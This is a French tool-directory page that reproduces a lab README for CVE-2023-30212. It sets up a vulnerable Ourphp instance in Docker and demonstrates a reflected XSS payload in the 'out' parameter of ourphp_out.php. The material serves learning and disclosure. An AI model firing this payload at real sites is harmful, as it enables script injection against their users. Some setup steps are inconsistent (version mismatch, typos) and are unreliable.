Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-30212-POC — Preuve de concept d'exploitation pour CVE-2023-30212, une vulnérabilité XSS dans Ourphp 7.2.0, incluant la configuration Docker et la démonstration de la charge utile. | Kitploit
Outils/GitHubGitHub/arunsnap/cve-2023-30212-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

Preuve de concept d'exploitation pour CVE-2023-30212, une vulnérabilité XSS dans Ourphp 7.2.0, incluant la configuration Docker et la démonstration de la charge utile.

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-30212-POC

Création d'un environnement Docker vulnérable et exploitation de la vulnérabilité dans Ourphp version 7.2.0 ( CVE 2023 30212 )

Étape 1. Téléchargez et installez Docker sur votre système. J'utilise Docker car c'est rapide et facile pour installer Ubuntu

Étape 2. Configuration de l'environnement Docker

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

Étape 3. Installation des dépendances

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

Étape 4. Installez le serveur web, php et mysql. J'installerai le serveur XAMPP pour cela.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

Étape 5. Téléchargez Ourphp version 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

Étape 6. Configurez Ourphp dans le navigateur. Ouvrez votre navigateur et entrez localhost ou 127.0.0.1. Suivez les instructions et installez Ourphp

Étape 7. Exploitation de la vulnérabilité. La version 7.2.0 d'Ourphp présente une vulnérabilité XSS (Cross-Site Scripting). Pour atténuer la vulnérabilité dans le fichier /client/manage /ourphp_out.php qui permet l'exécution de code XSS

connexion détection

vous devez modifier le code. La vulnérabilité survient lorsque le paramètre "ourphp_admin" est défini sur "logout" et que la variable contrôlable est "out"

final

Preuve de concept

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

vidéo

vidéo
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

Télécharger l’outil